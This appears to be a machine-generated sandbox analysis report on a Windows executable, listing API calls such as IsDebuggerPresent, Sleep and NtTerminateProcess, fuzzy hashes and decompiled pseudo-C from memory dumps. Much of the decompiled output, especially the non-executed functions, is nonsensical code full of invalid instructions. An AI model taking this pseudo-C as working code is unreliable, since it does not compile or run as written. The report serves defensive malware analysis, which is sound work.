              0x00424a9d

              APIs
              • IsDebuggerPresent.KERNEL32 ref: 00424A4D
              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00424A64
              • UnhandledExceptionFilter.KERNEL32(`:C), ref: 00424A6F
              • GetCurrentProcess.KERNEL32(C0000409), ref: 00424A8D
              • TerminateProcess.KERNEL32(00000000), ref: 00424A94
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.700846503.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.700841214.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000000.00000002.700881137.0000000000432000.00000004.00020000.sdmp Download File
              • Associated: 00000000.00000002.701019216.0000000001BE7000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
              • String ID: `:C
              • API String ID: 2579439406-2112543841
              • Opcode ID: ce5a9cd8f32a94825b97e140470348ba9d4a05fb146796b75582730bf51f6bfd
              • Instruction ID: e2b7c7c08dc63ef365ebcfff93dd5ecbf84560ad903b69aed1d0ec8e16751b0f
              • Opcode Fuzzy Hash: ce5a9cd8f32a94825b97e140470348ba9d4a05fb146796b75582730bf51f6bfd
              • Instruction Fuzzy Hash: AA21D2B8904304EBE710DF69FD44644BBA4FB08316F10617AE90993772E7796A85CF4D
              Uniqueness

              Uniqueness Score: -1.00%

              Executed Functions

              C-Code - Quality: 100%
              			E00401812(void* __edx) {
              				void* _t4;
              
              				 *((intOrPtr*)(_t4 - 0x77)) =  *((intOrPtr*)(_t4 - 0x77)) + __edx;
              			}




              0x00401812

              APIs
              • Sleep.KERNELBASE(00001388), ref: 00401854
              • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040187C
              Memory Dump Source
              • Source File: 00000001.00000002.765609356.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
              Similarity
              • API ID: ProcessSleepTerminate
              • String ID:
              • API String ID: 417527130-0
              • Opcode ID: a9242262985629b7ba65b23d5e149a247a5822ccc711938d973886dc562d5c51
              • Instruction ID: 66c4bf53945efb9eac17a29b63d6e60a7dc9cc17017cfcbb6067bf93f0ee6b10
              • Opcode Fuzzy Hash: a9242262985629b7ba65b23d5e149a247a5822ccc711938d973886dc562d5c51
              • Instruction Fuzzy Hash: EC011277548205EBEB007AA59C41AAA37289B05754F34C537FA12B80F1D67D8713A71F
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 70%
              			E00401813(void* __eflags, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
              				char _v8;
              				void* __ebx;
              				void* __edi;
              				void* __esi;
              				intOrPtr _t8;
              				void* _t11;
              				void* _t13;
              				void* _t16;
              				intOrPtr* _t17;
              				void* _t19;
              				void* _t20;
              				void* _t21;
              				void* _t22;
              				intOrPtr* _t23;
              
              				_t25 = __eflags;
              				_push(0x184c);
              				_t8 =  *_t23;
              				L0040113B(_t8, _t16, 0x5c, _t21, _t22, __eflags);
              				_t17 = _a4;
              				Sleep(0x1388);
              				_t11 = L0040138D(_t20, _t25, _t17, _a8, _a12,  &_v8); // executed
              				_t26 = _t11;
              				if(_t11 != 0) {
              					L00401460(_t17, _t20, _t21, _t22, _t26, _t17, _t11, _v8, _a16); // executed
              				}
              				 *_t17(0xffffffff, 0); // executed
              				_t13 = 0x184c;
              				_t19 = 0x5c;
              				return L0040113B(_t13, _t17, _t19, _t21, _t22, _t26);
              			}

















              0x00401813
              0x00401822
              0x00401827
              0x00401847
              0x0040184c
              0x00401854
              0x00401862
              0x00401867
              0x00401869
              0x00401873
              0x00401873
              0x0040187c
              0x0040188b
              0x0040189b
              0x004018ac

              APIs
              • Sleep.KERNELBASE(00001388), ref: 00401854
              • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040187C
              Memory Dump Source
              • Source File: 00000001.00000002.765609356.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
              Similarity
              • API ID: ProcessSleepTerminate
              • String ID:
              • API String ID: 417527130-0
              • Opcode ID: 89745b0bfaaf1c7b55dfe8fa037d4d7c0223a41cfa17f4c26d190fbbe19b2ead
              • Instruction ID: 7d9be0058e33673f170ed7bdf9e45501506609fca6745517c781ff617e647718
              • Opcode Fuzzy Hash: 89745b0bfaaf1c7b55dfe8fa037d4d7c0223a41cfa17f4c26d190fbbe19b2ead
              • Instruction Fuzzy Hash: 9A014F77608205FBEB007AA59C41EBA362C9B04754F24C437BA03B80F1DA7C9712A76F
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 65%
              			E00401830(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
              				intOrPtr _t8;
              				void* _t11;
              				void* _t13;
              				intOrPtr* _t17;
              				void* _t20;
              				void* _t26;
              				intOrPtr* _t28;
              
              				_t31 = __eflags;
              				_t24 = __esi;
              				_t22 = __edi;
              				_t21 = __edx;
              				_push(__edx);
              				_push(0x184c);
              				_t8 =  *_t28;
              				L0040113B(_t8, __ebx, 0x5c, __edi, __esi, __eflags);
              				_t17 =  *((intOrPtr*)(_t26 + 8));
              				Sleep(0x1388);
              				_t11 = L0040138D(_t21, _t31, _t17,  *((intOrPtr*)(_t26 + 0xc)),  *((intOrPtr*)(_t26 + 0x10)), _t26 - 4); // executed
              				_t32 = _t11;
              				if(_t11 != 0) {
              					L00401460(_t17, _t21, _t22, __esi, _t32, _t17, _t11,  *((intOrPtr*)(_t26 - 4)),  *((intOrPtr*)(_t26 + 0x14))); // executed
              				}
              				 *_t17(0xffffffff, 0); // executed
              				_t13 = 0x184c;
              				_t20 = 0x5c;
              				return L0040113B(_t13, _t17, _t20, _t22, _t24, _t32);
              			}










              0x00401830
              0x00401830
              0x00401830
              0x00401830
              0x00401830
              0x00401822
              0x00401827
              0x00401847
              0x0040184c
              0x00401854
              0x00401862
              0x00401867
              0x00401869
              0x00401873
              0x00401873
              0x0040187c
              0x0040188b
              0x0040189b
              0x004018ac

              APIs
              • Sleep.KERNELBASE(00001388), ref: 00401854
              • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040187C
              Memory Dump Source
              • Source File: 00000001.00000002.765609356.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
              Similarity
              • API ID: ProcessSleepTerminate
              • String ID:
              • API String ID: 417527130-0
              • Opcode ID: f0b3e7d236e0b2aebba72a48561d88988893c2cfd0a9863272573b7202c77ad1
              • Instruction ID: deb966eb77b9a567301be81d0aa6add722e5d663e7a56bf983217a5254dc7aad
              • Opcode Fuzzy Hash: f0b3e7d236e0b2aebba72a48561d88988893c2cfd0a9863272573b7202c77ad1
              • Instruction Fuzzy Hash: D9F0E677608205EBEB007A959C41EBA36289B04755F34C437BA13B90F1DA7D9712A72F
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 79%
              			E00401833(void* __ebx, void* __edi, void* __esi, void* __eflags) {
              				void* __ecx;
              				void* _t8;
              				void* _t11;
              				void* _t13;
              				intOrPtr* _t17;
              				void* _t21;
              				void* _t22;
              				void* _t27;
              
              				_t30 = __eflags;
              				_t25 = __esi;
              				_t23 = __edi;
              				L0040113B(_t8, __ebx, 0x5c, __edi, __esi, __eflags);
              				_t17 =  *((intOrPtr*)(_t27 + 8));
              				Sleep(0x1388);
              				_t11 = L0040138D(_t22, _t30, _t17,  *((intOrPtr*)(_t27 + 0xc)),  *((intOrPtr*)(_t27 + 0x10)), _t27 - 4); // executed
              				_t31 = _t11;
              				if(_t11 != 0) {
              					L00401460(_t17, _t22, _t23, __esi, _t31, _t17, _t11,  *((intOrPtr*)(_t27 - 4)),  *((intOrPtr*)(_t27 + 0x14))); // executed
              				}
              				 *_t17(0xffffffff, 0); // executed
              				_t13 = 0x184c;
              				_t21 = 0x5c;
              				return L0040113B(_t13, _t17, _t21, _t23, _t25, _t31);
              			}











              0x00401833
              0x00401833
              0x00401833
              0x00401847
              0x0040184c
              0x00401854
              0x00401862
              0x00401867
              0x00401869
              0x00401873
              0x00401873
              0x0040187c
              0x0040188b
              0x0040189b
              0x004018ac

              APIs
              • Sleep.KERNELBASE(00001388), ref: 00401854
              • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040187C
              Memory Dump Source
              • Source File: 00000001.00000002.765609356.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
              Similarity
              • API ID: ProcessSleepTerminate
              • String ID:
              • API String ID: 417527130-0
              • Opcode ID: 3be197aa96b37fb01e35ccc665f06a57c5b22eeab7c7f1fa4e7c4c0b74a31191
              • Instruction ID: 618970b1dbb32a4db62a2ca4bba0e2ab9b1e6011c78eec4eed3c6938ee6c48e5
              • Opcode Fuzzy Hash: 3be197aa96b37fb01e35ccc665f06a57c5b22eeab7c7f1fa4e7c4c0b74a31191
              • Instruction Fuzzy Hash: DFF01277604205FBEB047AE19C41EBA36289B04755F24C537BA13B80F1DA3C8712A72F
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 63%
              			E00401836(void* __ebx, void* __edi, void* __esi, void* __eflags) {
              				void* _t8;
              				void* _t11;
              				void* _t13;
              				intOrPtr* _t17;
              				void* _t20;
              				void* _t21;
              				void* _t23;
              				void* _t27;
              
              				_t30 = __eflags;
              				_t25 = __esi;
              				_t23 = __edi - 1;
              				asm("invalid");
              				asm("int 0x8e");
              				L0040113B(_t8, __ebx, 0x5c, _t23, __esi, __eflags);
              				_t17 =  *((intOrPtr*)(_t27 + 8));
              				Sleep(0x1388);
              				_t11 = L0040138D(_t21, _t30, _t17,  *((intOrPtr*)(_t27 + 0xc)),  *((intOrPtr*)(_t27 + 0x10)), _t27 - 4); // executed
              				_t31 = _t11;
              				if(_t11 != 0) {
              					L00401460(_t17, _t21, _t23, __esi, _t31, _t17, _t11,  *((intOrPtr*)(_t27 - 4)),  *((intOrPtr*)(_t27 + 0x14))); // executed
              				}
              				 *_t17(0xffffffff, 0); // executed
              				_t13 = 0x184c;
              				_t20 = 0x5c;
              				return L0040113B(_t13, _t17, _t20, _t23, _t25, _t31);
              			}











              0x00401836
              0x00401836
              0x00401836
              0x00401837
              0x00401839
              0x00401847
              0x0040184c
              0x00401854
              0x00401862
              0x00401867
              0x00401869
              0x00401873
              0x00401873
              0x0040187c
              0x0040188b
              0x0040189b
              0x004018ac

              APIs
              • Sleep.KERNELBASE(00001388), ref: 00401854
              • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040187C
              Memory Dump Source
              • Source File: 00000001.00000002.765609356.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
              Similarity
              • API ID: ProcessSleepTerminate
              • String ID:
              • API String ID: 417527130-0
              • Opcode ID: 6270efecb34b7a24ecfb20c25f7994d7e548ab66cc763392a0d1480e5281e59a
              • Instruction ID: a9217997abf11aa28aa6879baaed046148431452325da12b2764b37c26675c88
              • Opcode Fuzzy Hash: 6270efecb34b7a24ecfb20c25f7994d7e548ab66cc763392a0d1480e5281e59a
              • Instruction Fuzzy Hash: 17F0FF77604205FBEB01AAA19C41A6A36289F05355F248477BA12B90F1DA389652A72B
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 79%
              			E00401842(void* __ebx, void* __edi, void* __esi, void* __eflags) {
              				void* __ecx;
              				void* _t8;
              				void* _t11;
              				void* _t13;
              				intOrPtr* _t17;
              				void* _t21;
              				void* _t27;
              
              				_t30 = __eflags;
              				_t25 = __esi;
              				_t23 = __edi;
              				L0040113B(_t8, __ebx, 0x5c, __edi, __esi, __eflags);
              				_t17 =  *((intOrPtr*)(_t27 + 8));
              				Sleep(0x1388);
              				_t11 = L0040138D(0xeb, _t30, _t17,  *((intOrPtr*)(_t27 + 0xc)),  *((intOrPtr*)(_t27 + 0x10)), _t27 - 4); // executed
              				_t31 = _t11;
              				if(_t11 != 0) {
              					L00401460(_t17, 0xeb, _t23, __esi, _t31, _t17, _t11,  *((intOrPtr*)(_t27 - 4)),  *((intOrPtr*)(_t27 + 0x14))); // executed
              				}
              				 *_t17(0xffffffff, 0); // executed
              				_t13 = 0x184c;
              				_t21 = 0x5c;
              				return L0040113B(_t13, _t17, _t21, _t23, _t25, _t31);
              			}










              0x00401842
              0x00401842
              0x00401842
              0x00401847
              0x0040184c
              0x00401854
              0x00401862
              0x00401867
              0x00401869
              0x00401873
              0x00401873
              0x0040187c
              0x0040188b
              0x0040189b
              0x004018ac

              APIs
              • Sleep.KERNELBASE(00001388), ref: 00401854
              • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040187C
              Memory Dump Source
              • Source File: 00000001.00000002.765609356.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
              Similarity
              • API ID: ProcessSleepTerminate
              • String ID:
              • API String ID: 417527130-0
              • Opcode ID: b4b0a9984882ff5f2b6faabf12f6e8ec5eae452e92f205c2972abf1b7a202191
              • Instruction ID: 04e1208274e68be980b74980f77298c45205cb64358d3d7bc66da16523479b8c
              • Opcode Fuzzy Hash: b4b0a9984882ff5f2b6faabf12f6e8ec5eae452e92f205c2972abf1b7a202191
              • Instruction Fuzzy Hash: E5F03677604205FAEF007FE19C41EAA3728DF08759F248537BA12B80F1D5388612A72E
              Uniqueness

              Uniqueness Score: -1.00%

              Non-executed Functions

              C-Code - Quality: 57%
              			E0040202C(char __eax, signed int __edi, signed int __esi, void* __eflags) {
              				char _t23;
              				intOrPtr _t31;
              				signed char _t38;
              				signed char _t41;
              				signed int _t42;
              				signed int _t44;
              				signed char _t46;
              				signed char _t51;
              				signed char _t54;
              				signed char _t62;
              				void* _t69;
              				signed int _t80;
              
              				_t44 = __esi;
              				_t42 = __edi;
              				_t23 = __eax;
              				_t32 = 0x14;
              				asm("sbb eax, ebp");
              				_t38 = _t51;
              				if(__eflags < 0) {
              					L1:
              					asm("sbb dh, [ebx+0x4c4cecdf]");
              					asm("iretd");
              					 *((char*)(_t38 + _t38 * 8 - 0x74)) = _t23;
              					_t51 = _t46;
              					asm("invalid");
              					_t44 = _t44 + 1;
              					asm("adc ecx, [ebx+0x4c4cb009]");
              					L3:
              					 *(_t23 + 0x4c4c4c4c) =  *(_t23 + 0x4c4c4c4c) | _t44;
              					asm("cmpsd");
              					_t38 = _t38 + 1;
              					asm("iretd");
              					_t46 =  *(_t42 - 0x6f);
              					asm("adc ecx, [edi+0x73]");
              					asm("movsd");
              					asm("pushfd");
              					L5:
              					asm("rcr dword [ecx], 0xb4");
              					_t42 = _t42 + 1;
              					asm("enter 0x4c4c, 0x4c");
              					asm("int 0x9");
              					_t54 = ds;
              					_t51 = _t54;
              					_t32 = 0x39;
              					_t23 = 0xb7;
              					_t69 = 0xb7;
              					_pop(ds);
              				}
              				if(_t69 == 0) {
              					goto L3;
              				}
              				 *(_t23 + 0x1eb419c1) =  *(_t23 + 0x1eb419c1) | _t42;
              				while(1) {
              					L8:
              					asm("sbb [esi+ebx-0x4c4bc64d], esi");
              					asm("enter 0x4c4c, 0x4c");
              					_t51 = _t46;
              					_pop(_t46);
              					asm("invalid");
              					if( *((intOrPtr*)(_t23 - 0x204cb8da)) >= _t42) {
              						goto L5;
              					}
              					 *(_t23 - 0x45368439) =  *(_t23 - 0x45368439) ^ _t42;
              					_t38 = _t38 ^  *(_t23 - 0x37);
              					_push(_t23);
              					if(_t38 >= 0) {
              						goto L1;
              					}
              					_t41 = 0xbc16138 +  *((intOrPtr*)(_t44 + 0x4d));
              					if((_t23 - _t32 & _t38) != 0) {
              						_pop(ds);
              						asm("movsb");
              						_t41 = _t41 ^  *(_t42 - 0x73364c4d);
              						L12:
              						asm("invalid");
              						while(1) {
              							_t38 =  *_t38;
              							asm("cmpsd");
              							asm("int 0x8b");
              							_push(0x4c);
              							_t46 = _t46 + 2 - 1;
              							_t62 = _t51 - 0xfffffffffffffffd;
              							_t23 = 0x4c +  *((intOrPtr*)(_t42 - 0x47c64c7d));
              							_t32 = 0x1f;
              							if(_t23 < 0) {
              								goto L8;
              							}
              							_push(_t41);
              							_t51 = _t62;
              							asm("adc al, 0xa7");
              							_t38 = _t38 - 1;
              							if(_t38 == 0) {
              								continue;
              							} else {
              								asm("cmpsd");
              								_t46 = _t46 - 1;
              								asm("lds esp, [ecx+ebp*2]");
              								_t44 = _t44 - 1;
              								_t80 = _t44;
              								_t51 = _t51;
              								asm("adc eax, 0xa95949a7");
              								asm("cmpsd");
              							}
              							goto L16;
              						}
              						continue;
              					}
              					L16:
              					if(_t80 >= 0) {
              						goto L12;
              					}
              					_t31 =  *((intOrPtr*)(_t46 - 4));
              					return _t31;
              				}
              				goto L5;
              			}















              0x0040202c
              0x0040202c
              0x0040202c
              0x0040202e
              0x00402030
              0x00402032
              0x00402034
              0x00402036
              0x00402039
              0x00402040
              0x00402041
              0x00402043
              0x00402044
              0x00402046
              0x00402047
              0x00402049
              0x00402049
              0x0040204f
              0x00402050
              0x00402051
              0x00402052
              0x00402056
              0x00402059
              0x0040205a
              0x00402064
              0x00402064
              0x0040206c
              0x00402070
              0x00402074
              0x00402078
              0x0040207a
              0x0040207b
              0x0040207f
              0x0040207f
              0x00402081
              0x00402081
              0x00402082
              0x00000000
              0x00000000
              0x00402084
              0x00402087
              0x00402087
              0x00402087
              0x00402094
              0x00402098
              0x00402098
              0x00402099
              0x0040209b
              0x00000000
              0x00000000
              0x0040209d
              0x004020a6
              0x004020ae
              0x004020af
              0x00000000
              0x00000000
              0x004020b3
              0x004020b8
              0x004020bd
              0x004020be
              0x004020bf
              0x004020c4
              0x004020c4
              0x004020c6
              0x004020c7
              0x004020ce
              0x004020d0
              0x004020d2
              0x004020d3
              0x004020d5
              0x004020d6
              0x004020dc
              0x004020de
              0x00000000
              0x00000000
              0x004020e8
              0x004020ea
              0x004020eb
              0x004020ed
              0x004020ee
              0x00000000
              0x004020f0
              0x004020f0
              0x004020f6
              0x004020f7
              0x004020fa
              0x004020fa
              0x004020fc
              0x004020fd
              0x00402102
              0x00402103
              0x00000000
              0x004020ee
              0x00000000
              0x004020c6
              0x00402106
              0x00402106
              0x00000000
              0x00000000
              0x0040210a
              0x00402111
              0x00402111
              0x00000000

              Memory Dump Source
              • Source File: 00000001.00000002.765609356.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: fbabc42fb16564f7cbcb1c556b6a87cc50b5c42c687b1a9ef82ddbbf6acab553
              • Instruction ID: a8a887d8135cfffa22a9d8b74fa84127aed7572815cebf71017f25ce6cebea50
              • Opcode Fuzzy Hash: fbabc42fb16564f7cbcb1c556b6a87cc50b5c42c687b1a9ef82ddbbf6acab553
              • Instruction Fuzzy Hash: 2921E0B9A12A44CFCB28CB649B461E1B7A0FE6230075551DFC1529B7B1CA618883CFD7
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 50%
              			E00402052(char __eax, signed char __ecx, signed int __edi, signed int __esi) {
              				char _t23;
              				intOrPtr _t31;
              				signed char _t38;
              				signed char _t40;
              				signed int _t41;
              				signed int _t43;
              				intOrPtr _t45;
              				intOrPtr _t46;
              				intOrPtr _t53;
              				intOrPtr _t56;
              				intOrPtr _t62;
              				signed int _t79;
              
              				L0:
              				while(1) {
              					L0:
              					_t43 = __esi;
              					_t41 = __edi;
              					_t38 = __ecx;
              					_t23 = __eax;
              					_t45 =  *((intOrPtr*)(__edi - 0x6f));
              					asm("adc ecx, [edi+0x73]");
              					asm("movsd");
              					asm("pushfd");
              					while(1) {
              						L4:
              						asm("rcr dword [ecx], 0xb4");
              						_t41 = _t41 + 1;
              						asm("enter 0x4c4c, 0x4c");
              						asm("int 0x9");
              						_t56 = ds;
              						_t53 = _t56;
              						_t34 = 0x39;
              						_t23 = 0xb7;
              						_pop(ds);
              						L5:
              						if(0xb7 == 0) {
              							L3:
              							 *(_t23 + 0x4c4c4c4c) =  *(_t23 + 0x4c4c4c4c) | _t43;
              							asm("cmpsd");
              							_t38 = _t38 + 1;
              							asm("iretd");
              							goto L0;
              						}
              						L6:
              						 *0x1EB41A78 =  *0x1EB41A78 | _t41;
              						while(1) {
              							L7:
              							asm("sbb [esi+ebx-0x4c4bc64d], esi");
              							asm("enter 0x4c4c, 0x4c");
              							_t53 = _t46;
              							_pop(_t46);
              							asm("invalid");
              							if( *((intOrPtr*)(_t23 - 0x204cb8da)) >= _t41) {
              								break;
              							}
              							L8:
              							 *(_t23 - 0x45368439) =  *(_t23 - 0x45368439) ^ _t41;
              							_t38 = _t38 ^  *(_t23 - 0x37);
              							_push(_t23);
              							if(_t38 >= 0) {
              								L1:
              								asm("sbb dh, [ebx+0x4c4cecdf]");
              								asm("iretd");
              								 *((char*)(_t38 + _t38 * 8 - 0x74)) = _t23;
              								L2:
              								_t53 = _t45;
              								_pop(_t46);
              								asm("invalid");
              								_t43 = _t43 + 1;
              								asm("adc ecx, [ebx+0x4c4cb009]");
              								goto L3;
              							}
              							L9:
              							_t40 = 0xbc16138 +  *((intOrPtr*)(_t43 + 0x4d));
              							if((_t23 - _t34 & _t38) != 0) {
              								L10:
              								_pop(ds);
              								asm("movsb");
              								_t40 = _t40 ^  *(_t41 - 0x73364c4d);
              								L11:
              								asm("invalid");
              								while(1) {
              									L12:
              									_t38 =  *_t38;
              									asm("cmpsd");
              									asm("int 0x8b");
              									_push(0x4c);
              									_t46 = _t46 + 2 - 1;
              									_t62 = _t53 - 0xfffffffffffffffd;
              									_t23 = 0x4c +  *((intOrPtr*)(_t41 - 0x47c64c7d));
              									_t34 = 0x1f;
              									if(_t23 < 0) {
              										goto L7;
              									}
              									L13:
              									_push(_t40);
              									_t53 = _t62;
              									asm("adc al, 0xa7");
              									_t38 = _t38 - 1;
              									if(_t38 == 0) {
              										continue;
              									} else {
              										L14:
              										asm("cmpsd");
              										_t46 = _t46 - 1;
              										asm("lds esp, [ecx+ebp*2]");
              										_t43 = _t43 - 1;
              										_t79 = _t43;
              										_t53 = _t53;
              										asm("adc eax, 0xa95949a7");
              										asm("cmpsd");
              									}
              									goto L15;
              								}
              								continue;
              							}
              							L15:
              							if(_t79 >= 0) {
              								goto L11;
              							}
              							L16:
              							_t31 =  *((intOrPtr*)(_t46 - 4));
              							L17:
              							return _t31;
              							L18:
              						}
              						L4:
              						asm("rcr dword [ecx], 0xb4");
              						_t41 = _t41 + 1;
              						asm("enter 0x4c4c, 0x4c");
              						asm("int 0x9");
              						_t56 = ds;
              						_t53 = _t56;
              						_t34 = 0x39;
              						_t23 = 0xb7;
              						_pop(ds);
              						goto L5;
              					}
              				}
              			}















              0x00402052
              0x00402052
              0x00402052
              0x00402052
              0x00402052
              0x00402052
              0x00402052
              0x00402052
              0x00402056
              0x00402059
              0x0040205a
              0x00402064
              0x00402064
              0x00402064
              0x0040206c
              0x00402070
              0x00402074
              0x00402078
              0x0040207a
              0x0040207b
              0x0040207f
              0x00402081
              0x00402082
              0x00402082
              0x00402049
              0x00402049
              0x0040204f
              0x00402050
              0x00402051
              0x00000000
              0x00402051
              0x00402084
              0x00402084
              0x00402087
              0x00402087
              0x00402087
              0x00402094
              0x00402098
              0x00402098
              0x00402099
              0x0040209b
              0x00000000
              0x00000000
              0x0040209d
              0x0040209d
              0x004020a6
              0x004020ae
              0x004020af
              0x00402036
              0x00402039
              0x00402040
              0x00402041
              0x00402042
              0x00402043
              0x00402043
              0x00402044
              0x00402046
              0x00402047
              0x00000000
              0x00402047
              0x004020b1
              0x004020b3
              0x004020b8
              0x004020ba
              0x004020bd
              0x004020be
              0x004020bf
              0x004020c4
              0x004020c4
              0x004020c6
              0x004020c6
              0x004020c7
              0x004020ce
              0x004020d0
              0x004020d2
              0x004020d3
              0x004020d5
              0x004020d6
              0x004020dc
              0x004020de
              0x00000000
              0x00000000
              0x004020e0
              0x004020e8
              0x004020ea
              0x004020eb
              0x004020ed
              0x004020ee
              0x00000000
              0x004020f0
              0x004020f0
              0x004020f0
              0x004020f6
              0x004020f7
              0x004020fa
              0x004020fa
              0x004020fc
              0x004020fd
              0x00402102
              0x00402103
              0x00000000
              0x004020ee
              0x00000000
              0x004020c6
              0x00402106
              0x00402106
              0x00000000
              0x00000000
              0x00402108
              0x0040210a
              0x0040210d
              0x00402111
              0x00000000
              0x00402111
              0x00402064
              0x00402064
              0x0040206c
              0x00402070
              0x00402074
              0x00402078
              0x0040207a
              0x0040207b
              0x0040207f
              0x00402081
              0x00000000
              0x00402081
              0x00402064

              Memory Dump Source
              • Source File: 00000001.00000002.765609356.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 582d09d55ad77c1e7aeb8d300c24ad101f826c757ddfc10a404fb46e83914ed8
              • Instruction ID: c83445de43d01cce4181a3408f6f95faafacb7355a4cde8baead310d89bed673
              • Opcode Fuzzy Hash: 582d09d55ad77c1e7aeb8d300c24ad101f826c757ddfc10a404fb46e83914ed8
              • Instruction Fuzzy Hash: A221CCB8A02A04CFC625CB649A891D2F7A0FE62304B18519BC1525BB71D2754883CFE7
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 27%
              			E00402403(void* __ecx, void* __edx, signed int __edi, void* __fp0) {
              				signed char _t42;
              				signed int _t44;
              				signed int _t65;
              				signed int _t70;
              				void* _t72;
              				signed int _t74;
              
              				L0:
              				while(1) {
              					L0:
              					_t42 =  *0xcf0a384c;
              					 *(_t42 - 0x5fc64cb2) =  *(_t42 - 0x5fc64cb2) | _t74;
              					_pop(ds);
              					if((_t42 | 0x000000b3) != 0) {
              						break;
              					}
              					L1:
              					_t44 =  *0xc73f384c;
              					 *(_t44 - 0x3aa7f339) =  *(_t44 - 0x3aa7f339) | __edi;
              					 *(_t70 + __edi * 2 - 0x4bce884d) =  *(_t70 + __edi * 2 - 0x4bce884d) | _t65;
              					asm("aas");
              					asm("das");
              					asm("rcr dword [ecx], 0xa0");
              					_push(ds);
              					asm("sbb esi, [ebx-0x204c57c7]");
              					asm("iretd");
              					 *(_t44 - 0x30f5c7b4) =  *(_t44 - 0x30f5c7b4) ^ _t74 - 0xffffffffffffffff;
              				}
              				L2:
              				 *(__ecx + _t44 * 8 - 0x4ce15fe7) =  *(__ecx + _t44 * 8 - 0x4ce15fe7) | __edi;
              				asm("sbb esi, [ebx-0x204c57c7]");
              				asm("invalid");
              				asm("iretd");
              				 *(_t44 - 0x38a2c7b4) =  *(_t44 - 0x38a2c7b4) ^ _t70;
              				 *(__ecx + 0x1f1c5c0c +  *0xc75d384c * 8) =  *(__ecx + 0x1f1c5c0c +  *0xc75d384c * 8) | __edi;
              				asm("movsb");
              				_pop(_t72);
              				asm("invalid");
              				asm("es movsd");
              				asm("cmpsd");
              				asm("adc dh, bh");
              				asm("pushad");
              				asm("frstor [ebx+ebx*2]");
              				asm("outsb");
              				asm("adc al, 0xa7");
              				asm("sbb ebx, [edx]");
              				asm("cmpsd");
              				asm("in al, dx");
              				 *0xFFFFFFFFA45EA814 = 0xa74888cf;
              				asm("cmpsb");
              				asm("int3");
              				asm("cmpsd");
              				 *0xa0d5a4bf = 0x84;
              				return  *((intOrPtr*)(_t72 - 4));
              			}









              0x00402403
              0x00402403
              0x00402403
              0x00402403
              0x00402408
              0x00402411
              0x00402412
              0x00000000
              0x00000000
              0x004023d9
              0x004023d9
              0x004023de
              0x004023e4
              0x004023eb
              0x004023ec
              0x004023ed
              0x004023f0
              0x004023f7
              0x00402401
              0x00402402
              0x00402402
              0x00402414
              0x00402414
              0x00402422
              0x0040242d
              0x00402430
              0x00402431
              0x00402437
              0x0040243e
              0x00402443
              0x00402444
              0x00402464
              0x00402473
              0x00402475
              0x00402477
              0x00402478
              0x0040247b
              0x0040247e
              0x00402481
              0x00402483
              0x0040248a
              0x00402490
              0x00402498
              0x00402499
              0x0040249a
              0x0040249b
              0x004024a9

              Memory Dump Source
              • Source File: 00000001.00000002.765609356.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: fb2763b50332117d4cd38ebd3a92fb9766fda1add63ad4ca90e9e0cadc5d9c26
              • Instruction ID: 0f27eaa69be10ba5d10042c069f8084f082d4262394f61c98c3ff60c1b4368df
              • Opcode Fuzzy Hash: fb2763b50332117d4cd38ebd3a92fb9766fda1add63ad4ca90e9e0cadc5d9c26
              • Instruction Fuzzy Hash: 61F0E932905640DFC705CF10F50748477B4FE4170172255DAC4D256971CB3691E3CF86
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 25%
              			E004023D9(void* __ecx, void* __edx, signed int __edi, signed int __esi, void* __fp0) {
              				intOrPtr _t42;
              				signed char _t43;
              				signed int _t44;
              				signed int _t70;
              				void* _t72;
              				void* _t74;
              				signed int _t77;
              
              				do {
              					_t42 =  *0xc73f384c;
              					 *(_t42 - 0x3aa7f339) =  *(_t42 - 0x3aa7f339) | __edi;
              					 *(_t70 + __edi * 2 - 0x4bce884d) =  *(_t70 + __edi * 2 - 0x4bce884d) | __esi;
              					asm("aas");
              					asm("das");
              					asm("rcr dword [ecx], 0xa0");
              					_t77 = _t74 - 0xffffffffffffffff;
              					asm("sbb esi, [ebx-0x204c57c7]");
              					asm("iretd");
              					 *(_t42 - 0x30f5c7b4) =  *(_t42 - 0x30f5c7b4) ^ _t77;
              					_t43 =  *0xcf0a384c;
              					 *(_t43 - 0x5fc64cb2) =  *(_t43 - 0x5fc64cb2) | _t77;
              					_t44 = _t43 | 0x000000b3;
              					ds = ds;
              				} while (_t44 == 0);
